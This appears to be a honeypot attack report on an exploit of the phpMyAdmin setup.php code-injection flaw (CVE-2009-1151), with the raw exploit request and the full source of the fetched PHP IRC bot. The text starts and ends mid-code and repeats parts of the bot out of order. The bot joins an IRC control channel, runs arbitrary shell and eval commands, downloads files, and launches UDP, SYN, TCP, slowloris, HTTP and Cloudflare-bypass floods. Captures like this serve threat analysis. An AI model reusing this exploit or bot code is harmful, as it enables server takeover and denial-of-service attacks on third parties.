fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.216.174.175
Dest. port: 80
Time: 17/02/2019 01:49:26
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Newland, Helsinki (zipcode 00100)
rDNS: static.175.174.216.95.clients.your-server.de
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 241
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A32%3A%22ftp%3A%2F%2F51%2E38%2E119%2E192%2Fpub%2Fpbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 2be6db19e83a9cd7b4923319ce60c662
Type: text/x-php
Size: 39364
URL: ftp://51.38.119.192/pub/pbot.php
<?php
$cfg = array(
"server" => "51.38.119.192",
"port" => "6667",
"key" => "",
"prefix" => "Zombie",
"maxrand" => "8",
"chan" => "#exploitation",
"trigger" => ".",
"hostauth" => "ddos"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - PROXYHTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
